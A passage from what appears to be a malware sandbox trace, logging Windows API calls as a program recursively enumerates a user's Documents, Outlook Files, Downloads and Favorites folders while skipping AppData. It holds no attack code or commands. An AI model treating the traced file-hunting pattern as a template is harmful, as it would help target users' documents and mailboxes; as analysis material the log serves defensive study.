dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0028.993] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0028.993] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x777648, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0028.993] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="_private", cAlternateFileName="")) returned 1 [0028.993] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0028.993] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x6addd8 | out: lpFindFileData=0x6addd8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c22c0 [0029.003] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addd8 | out: lpFindFileData=0x6addd8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0029.004] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addd8 | out: lpFindFileData=0x6addd8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x4, dwReserved1=0x777648, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0029.004] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x1500046, ftCreationTime.dwLowDateTime=0x36bb57, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x15e0047, nFileSizeHigh=0x36bb57, nFileSizeLow=0x88a0f0, dwReserved0=0x10, dwReserved1=0x777648, cFileName="鞠麿\x08", cAlternateFileName="⃀{jဓĩ\x10")) returned 0 [0029.004] FindClose (in: hFindFile=0x7c22c0 | out: hFindFile=0x7c22c0) returned 1 [0029.004] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x13c0057, ftCreationTime.dwLowDateTime=0x36bb6f, ftCreationTime.dwHighDateTime=0x777648, ftLastAccessTime.dwLowDateTime=0x36bb5a, ftLastAccessTime.dwHighDateTime=0x8, ftLastWriteTime.dwLowDateTime=0x1336310, ftLastWriteTime.dwHighDateTime=0x1320058, nFileSizeHigh=0x36bb6f, nFileSizeLow=0x777338, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="盈w\x08", cAlternateFileName="᳘{jဓĩ\x10")) returned 0 [0029.004] FindClose (in: hFindFile=0x7c2200 | out: hFindFile=0x7c2200) returned 1 [0029.004] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x777648, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0029.004] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0029.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Videos", cchCount1=9, lpString2="AppData", cchCount2=7) returned 3 [0029.004] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.004] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x7734e0d2, ftCreationTime.dwLowDateTime=0x88a030, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x889a86, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xa1001f8, nFileSizeHigh=0x33c1a9, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="", cAlternateFileName="ᬠ{jဓĩ\x10")) returned 0xffffffff [0029.006] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6ae53c, dwReserved1=0x777648, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0029.011] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0029.011] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Outlook Files", cchCount1=13, lpString2="AppData", cchCount2=7) returned 3 [0029.011] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.011] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2200 [0029.029] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0029.029] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0029.029] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x1440057, ftCreationTime.dwLowDateTime=0x36bbec, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0x15, ftLastWriteTime.dwHighDateTime=0x1380058, nFileSizeHigh=0x36bbec, nFileSizeLow=0x7b5980, dwReserved0=0x10, dwReserved1=0x777648, cFileName="콀戨\x08", cAlternateFileName="ᬠ{jဓĩ\x10")) returned 0 [0029.029] FindClose (in: hFindFile=0x7c2200 | out: hFindFile=0x7c2200) returned 1 [0029.029] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6746d0c0, ftCreationTime.dwHighDateTime=0x1d57fb5, ftLastAccessTime.dwLowDateTime=0x573ff8b0, ftLastAccessTime.dwHighDateTime=0x1d5b0bf, ftLastWriteTime.dwLowDateTime=0x573ff8b0, ftLastWriteTime.dwHighDateTime=0x1d5b0bf, nFileSizeHigh=0x0, nFileSizeLow=0x9ed1, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="pMd_CmUNe5hcq1EzK.xlsx", cAlternateFileName="PMD_CM~1.XLS")) returned 1 [0029.029] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x410244d0, ftCreationTime.dwHighDateTime=0x1d5ba52, ftLastAccessTime.dwLowDateTime=0x2bd81670, ftLastAccessTime.dwHighDateTime=0x1d54c89, ftLastWriteTime.dwLowDateTime=0x2bd81670, ftLastWriteTime.dwHighDateTime=0x1d54c89, nFileSizeHigh=0x0, nFileSizeLow=0x793e, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="XTFgSi8S58kpp1FfY.docx", cAlternateFileName="XTFGSI~1.DOC")) returned 1 [0029.029] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb456a080, ftCreationTime.dwHighDateTime=0x1d568d0, ftLastAccessTime.dwLowDateTime=0x6ef70c0, ftLastAccessTime.dwHighDateTime=0x1d5a02f, ftLastWriteTime.dwLowDateTime=0x6ef70c0, ftLastWriteTime.dwHighDateTime=0x1d5a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1550b, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="zldtrs1nh.docx", cAlternateFileName="ZLDTRS~1.DOC")) returned 1 [0029.029] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4be5b000, ftCreationTime.dwHighDateTime=0x1d55664, ftLastAccessTime.dwLowDateTime=0x68a94680, ftLastAccessTime.dwHighDateTime=0x1d5b5e5, ftLastWriteTime.dwLowDateTime=0x68a94680, ftLastWriteTime.dwHighDateTime=0x1d5b5e5, nFileSizeHigh=0x0, nFileSizeLow=0x11955, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="_H6YZ.docx", cAlternateFileName="_H6YZ~1.DOC")) returned 1 [0029.029] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x1240068, ftCreationTime.dwLowDateTime=0x36bc38, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x1300069, nFileSizeHigh=0x36bc38, nFileSizeLow=0x889e08, dwReserved0=0x10, dwReserved1=0x777648, cFileName="_H\x08", cAlternateFileName="ᩘ{jဓĩ\x10")) returned 0 [0029.029] FindClose (in: hFindFile=0x7c2140 | out: hFindFile=0x7c2140) returned 1 [0029.030] FindNextFileW (in: hFindFile=0x7c2080, lpFindFileData=0x6ae4c8 | out: lpFindFileData=0x6ae4c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0029.030] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0029.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Downloads", cchCount1=9, lpString2="AppData", cchCount2=7) returned 3 [0029.030] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.030] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2140 [0029.030] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0029.030] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0029.030] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x1300068, ftCreationTime.dwLowDateTime=0x36bc81, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x1120069, nFileSizeHigh=0x36bc81, nFileSizeLow=0x889d30, dwReserved0=0x10, dwReserved1=0x777648, cFileName="ዠⴞ\x08", cAlternateFileName="ᩘ{jဓĩ\x10")) returned 0 [0029.030] FindClose (in: hFindFile=0x7c2140 | out: hFindFile=0x7c2140) returned 1 [0029.030] FindNextFileW (in: hFindFile=0x7c2080, lpFindFileData=0x6ae4c8 | out: lpFindFileData=0x6ae4c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0029.030] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0029.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Favorites", cchCount1=9, lpString2="AppData", cchCount2=7) returned 3 [0029.030] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.031] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2140 [0029.031] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0029.031] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0029.031] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x777648, cFileName="Links", cAlternateFileName="")) returned 1 [0029.032] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0029.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Links", cchCount1=5, lpString2="AppData", cchCount2=7) returned 3 [0029.032] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.032] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2200 [0029.036] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0029.036] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0029.036] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0x10, dwReserved1=0x777648, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1 [0029.036] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x10, dwReserved1=0x777648, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0029.036] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x1380057, ftCreationTime.dwLowDateTime=0x36bd15, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x1340058, nFileSizeHigh=0x36bd15, nFileSizeLow=0x889fd0, dwReserved0=0x10, dwReserved1=0x777648, cFileName="We\x08", cAlternateFileName="ᲈ{jဓĩ\x10")) returned 0 [0029.036] FindClose (in: hFindFile=0x7c2200 | out: hFindFile=0x7c2200) returned 1 [0029.036] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0029.036] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0029.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Microsoft Websites", cchCount1=18, lpString2="AppData", cchCount2=7) returned 3 [0029.036] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.036] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2200 [0029.040] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0029.040] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x2020e02, 